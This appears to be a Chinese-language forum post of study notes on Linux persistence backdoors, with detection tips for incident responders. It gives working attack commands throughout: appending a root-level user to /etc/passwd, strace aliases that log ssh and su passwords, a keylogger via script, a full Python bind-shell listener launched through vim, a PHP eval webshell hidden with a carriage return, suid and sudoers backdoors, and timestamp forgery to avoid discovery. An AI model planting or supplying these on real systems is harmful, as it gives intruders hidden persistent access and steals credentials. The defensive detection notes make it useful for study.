TL;DR

  • 最近遇到一些和后门相关的技术,所以把之前linux backdoor相关笔记重新学习和整理了一下。在这里做一下记录,后续有时间整理一下windows backdoor方面的技术。
  • 在服务器被入侵后进行应急响应无非通过文件排查、网络排查、进程排查、系统信息排查等方法进行入侵排查。下面就一些常见留后门技巧以及公开的工具进行剖析介绍。
  • 现在有一些公司在发现入侵之后直接重装系统,那么基本所有的后门就无法发挥权限维持的作用了,但作为一个安全从业人员还是需要对一些后门有一个基本的了解。

常见技巧

添加root权限后门用户

  • /etc/passwd这个文件包含了系统所有的用户名、ID、登录的shell等信息,这个文件是以分号分隔开的,依次是登录名、密码、用户ID、组ID,用户名、用户的根目录以及登录的shell,其中密码处可以是x(代表加密,存放在/etc/shadow文件中),也可以直接是加密后的密文,此外用户uid为0代表用户会是root的权限,这个时候我们的目标就是在这个文件中追加一条,一个带有密文且id为0的账号。
  • 关于密码加密我们可以使用下面的命令
    #密码M0rk
    xxx@ubuntu:~/Desktop$ perl -e 'print crypt("M0rk", "AA"). "\n"'
    AAhmo1jgYI0HE
  • 所以我们最终想要在passwd文件中的条目是这个样子的
    backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash
  • append the backdoor to passwd file
    echo "backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash">>/etc/passwd
    这里还有个知识点-有时候可以使用suid程序(find / perm /4000)cp命令覆盖/etc/passwd 来进行提权,比如
    cd /tmp
    echo "backdoor:AAhmo1jgYI0HE:0:0:me:/root:/bin/bash">>passwd
    cp passwd /etc/passwd
    echo M0rk|su - backdoor -c 'cat /flag'
  • 注意当我们拥有一个命令执行漏洞或写文件漏洞且为root权限,这个时候就可以通过这种方法直接添加用户。且sshd需要允许root用户远程登录,PermitRootLogin yes
  • 另外需要注意的是修改完文件之后记得修改一下文件的时间戳,防止被发现,可以使用touch命令进行伪造参考链接
  • 优点:简单
  • 缺点:易被检测到
  • 排查:检查/etc/passwd文件是否有异常

pam后门

  • PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(位于/lib/security)进行安全认证
  • 简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持,查询目标版本后下载对应源代码修改认证逻辑、编译替换原认证文件即可。版本务必要和目标系统完全保持对应。
    查看pam版本
    #debian
    dpkg -l | grep pam
    #redhat
    rpm -qa | grep pam
  • 之后可以使用这个脚本linux-pam-backdoor编译后门(自动联网下载对应源码、修改源码、编译动态链接库pam_unix.so),将生成的后门文件替换原来的文件即可。
    ./backdoor.sh -m key -v 1.3.0(替换成你系统对应的版本) -p som3_s3cr4t_p455w0rd
    注意:centos中需要关闭selinux,临时关闭setenforce 0。永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。
  • 注意为了隐蔽,还需要修改一下文件的时间,比如 touch pam_unix.so -r pam_access.so
  • 之后就可以使用任意用户名以及som3_s3cr4t_p455w0rd进行登录了。
  • 可参考
    Linux Pam后门总结拓展
    一般路过PAM后门 / SSH密码记录
    Linux pam 后门纪录root用户密码以及自己设置root密码登录root
    Linux PAM后门:窃取ssh密码及自定义密码登录
  • 优点:隐藏性较好
  • 缺点:需要联网下载pam源码及编译
  • 排查:根据ctime进行排查 如 find / -type f -ctime 0 2>/dev/null 查看最近24小时被修改过的文件,或者stat查看pam认证模块有没有被修改,以及结合登录日志等进行综合分析。

ssh免密码登录后门

  • 攻击者可以将其生成的ssh公钥写入到目标机器的authorized_keys文件中即可实现免密码登录(参考ssh免密码登录)。
  • 排查:检查用户.ssh目录下的authorized_keys文件中是否有异常的公钥。

strace记录ssh登录密码

alias ssh='strace   -o   /tmp/sshpwd-`date    '+%d%h%m%s'`.log  \
 -e read,write,connect  -s2048 ssh'  
也可记录 su密码 alias su='strace   -o   /tmp/sshpwd-`date    '+%d%h%m%s'`.log  \
 -e read,write,connect  -s2048 su'

  • 优点:改动较小
  • 缺点:易被检测到
  • 排查:通过排查shell的配置文件或者alias命令即可发现,例如~/.bashrc和~/.bash_profile文件查看是否有恶意的alias问题。(注意bash_profile是在登录的shell执行的,bashrc是在非登录的shell执行,即如果你只是想每次在登录的时候让它去执行,这个时候你可以把你的命令写在.bash_profile,如果你想每次打开一个新的终端的时候都去执行,那么应该把命令写在.bashrc中)。

键盘记录

  • 在进入到受害者机器之后有时需要键盘记录受害者的键盘输入记录以及执行命令后的结果,我们可以使用linux自带的script实现记录
    在shell启动脚本中加入如下命令可以记录输入到/tmp/test文件中:
    if [ -f /tmp/script.lock ];then
          rm /tmp/script.lock
    else
          echo lock > /tmp/script.lock
          exec script  /tmp/test -aqf
    fi

sshd后门

  • 一种是建立sshd的软连接方法,开启其它的端口例如

    ln -sf /usr/sbin/sshd /home/su
    /home/su -oport=2222
    ref: https://forum.90sec.com/t/topic/1852
  • 优点:简单

  • 缺点:易被检测到
  • 排查:使用netstat -antlp查看可疑端口,然后ls -l 可执行文件即可。
  • 第二种是通过在openssh源码中插入恶意代码重新编译并替换原有sshd文件。插入的恶意代码可以是将登录成功的用户密码发送到远程服务器或者记录到某个log文件中。
  • 优点:隐蔽性较好
  • 缺点:暂无
  • 排查:这种sshd后门一般可能会有一定的特征,可以通过strings sshd |grep '[1-9]{1,3}.[1-9]{1,3}.'或者通过strace 查看是否有可疑的写文件操作。
  • 还有第三种就是创建authorized_keys 实现免密码登录的后门,在本地生成公私钥对,然后将公钥写入服务器的authorized_keys文件中,客户端使用私钥进行登录。
  • 优点:简单
  • 缺点:暂无
  • 排查:查看linux所有用户.ssh 目录下是否存在authroieze_keys文件以及文件中的内容

计划任务

  • 一般的挖矿木马喜欢设置定时任务来进行驻留或进行分时段的挖矿。
  • 排查:一般通过crontab -l命令即可检测到定时任务后门(注意检查不同用户下的计划任务)。
  • 此外还应检查以下的文件和文件夹
    /etc/crontab
    /etc/cron.d/* 
    /var/spool/cron/xxxx 
    /etc/anacrontab (Redhat/Centos)

开机启动项

  • 不同的linux发行版可能查看开机启动项的文件不大相同。
    常见和启动相关文件和文件夹
    systemctl list-unit-files --type=service | grep enabled  //检查开机启动的服务
    /etc/rc.local
    /etc/rc.d/rc.local
    /etc/rc.d/init.d/
    /etc/systemd/system
    /etc/init.d/
    /etc/profile
    /etc/bashrc
    ~/.bashrc
    ~/.bash_profile
    ~/.profile

vim后门

#enter the mal script directory 、execute the script and then remove the script
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py
  • 此方法适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统,至于恶意脚本dir.py的内容可以是任何功能的后门。如python版本的正向后门监听11端口。
#from https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
        server=socket(AF_INET,SOCK_STREAM)
        server.bind(('0.0.0.0',11))
        server.listen(5)
        print 'waiting for connect'
        talk, addr = server.accept()
        print 'connect from',addr
        proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
                stdout=talk, stderr=talk, shell=True)

  • 优点:通过查看/proc/pid/cmdline查看不到具体执行了什么命令或恶意脚本。
  • 缺点:仍可以看到有vim进程
  • 排查:检测对应vim进程号虚拟目录的map文件是否有python字眼。
  • 参考文章Weapons of Text Destruction.

终端解析\r导致的问题

echo -e "<?=\`eval(\$_POST[good]\`);?>\r<?='PHP Test Page >||<                  ';?>" >/var/www/html/test.php


  • 优点:通过终端命令例如cat、more等命令查看不到恶意代码,适合隐藏一句话木马等。
  • 缺点:易被检测,只是通过终端命令查看的时候看不到恶意代码,而通过其它读文件操作或者通过vim等工具进行编辑查看的时候仍可以查看到恶意代码。
  • 排查:使用编辑器或者一般的webshell扫描工具即可检测。

命令过长导致截断的问题

  • 在使用ps进行进程查看的时候,不知道有没有人注意到这样一个问题,命令很长被截断,终端显示有时候为了美观,可能会截断较长的命令,比如在使用docker ps -a查看container的时候,可能你的command列会显示不全,那么使用docker ps -a --no-trunc让其显示完全。同样在使用ps命令查看进程的时候,也存在这种问题。可以在其填充大量的空格进行截断,那么就可达到“进程隐藏”的效果。

  • 其中使用了xhide工具github地址进行进程名的修改。

  • 优点:简单
  • 缺点:易被检测到
  • 排查:通过ps -aux|grep 可疑进程的pid 即可显示完全,或者使用ps aux | less -+S、ps aux | cat或ps aux | most -w等命令进行查看。
    这只是进程隐藏的一种方式,此外还有一些其他比较好的进程隐藏的方式,比如挂载覆盖型的进程隐藏,参考
    聊一聊Linux下进程隐藏的常见手法及侦测手段
    反入侵之发现后门利用mount-bind将进程和端口信息隐匿

预加载型动态链接库后门 ld.so.preload

  • 可能有些人不太了解,简单说一下,就是我们在linux下执行某个可执行文件之前,系统会预先加载用户定义的动态链接库的一种技术,这个技术可以重写系统的库函数,导致发生Hijack。
  • 如上图所示,strace 命令id的时候可以发现有预先去读取/etc/ld.so.preload文件(也可使用设置LD_PRELAOD环境变量方式),如果我们将事先写好的恶意so文件位置写入ld.so.preload文件,这个时候就会达到“劫持”的效果。
  • 比较好用的工具有Vegile和cub3等
    Vegile
    cub3,这个工具使用了LD_PRELOAD和系统的扩展属性去隐藏文件。
  • 更多参考:
    Linux文件系统扩展属性
  • 其中还有一种是通过修改动态链接器来加载恶意动态链接库的后门,通过替换或者修改动态链接器中的默认预加载配置文件/etc/ld.so.preload路径的rootkit,此方法更加隐蔽,这个方法的较成熟的利用工具是Vlany,github地址https://github.com/mempodippy/vlany
    警惕利用Linux预加载型恶意动态链接库的后门
  • 优点:可以隐藏文件、网络、进程等。相对于普通用户空间rootkit而言,隐藏性较好,相对于内核模块rootkit来说,兼容性更好,编写难道低
  • 缺点:暂无
  • 排查:通过strace命令去跟踪预加载的文件是否为/etc/ld.so.preload,以及文件中是否有异常的动态链接库。以及检查是否设置LD_PRELOAD环境变量等。注意:在进行应急响应的时候有可能系统命令被替换或者关键系统函数被劫持(例如通过预加载型动态链接库后门),导致系统命令执行不正常,这个时候可以下载busybox。下载编译好的对应平台版本的busybox,或者下载源码进行编译通过U盘拷贝到系统上,因为busybox是静态编译的,不依赖于系统的动态链接库,busybox的使用类似如下 busybox ls,busybox ps -a。
    #reference  https://unix.stackexchange.com/questions/475584/cannot-install-busybox-on-centos
    wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-x86_64
    mv busybox-x86_64 busybox
    chmod +x busybox
    ./busybox
    此外还可以通过检查系统完整性来查看被修改的命令
    RedHat 使用命令rpm -Va
    Debian 
    apt install debsums  
    debsums --all

提权后门

  • 有时候我们需要放一个suid后门来辅助我们提权,比如 cp /bin/bash /bin/nf & chmod +s /bin/nf,这样我们拿到一个普通权限的shell之后可以通过执行 /bin/nf 提升自己的权限为root
  • 此外还可以通过将某个普通用户添加到sudoers来提权,例如jenkins ALL=(ALL) NOPASSWD: ALL
  • 排查:suid后门查找 find / -perm -4000 ,sudo后门检查 /etc/sudoers文件和/etc/sudoers.d/目录

进程注入

  • 使用ptrace向进程中注入恶意so文件工具linux-inject,github地址

内核级rootkit

  • 内核级的rootkit也很多,这里简单推荐Diamorphine和boopkit

    github地址
  • 优点:隐藏性较好
  • 缺点:编写难度有点儿高
  • 排查:可以通过unhide等工具进行排查

    此外还有boopkit工具
  • boopkit链接

Other

  • 以上介绍了几种backdoor的技巧也只是冰山一角,这里抛砖引玉,希望有更多人分享自己的经验和奇淫技巧,笔者水平有限,文中定有不足之处,还望各位斧正。 Write your own backdoor and MAKE BACKDOOR GREAT AGAIN :D

Reference

linux rootkits
https://github.com/mfontanini/Programs-Scripts/
Reptile
icmpsh
Diamorphine

点击收藏 | 5 关注 | 3
登录 后跟帖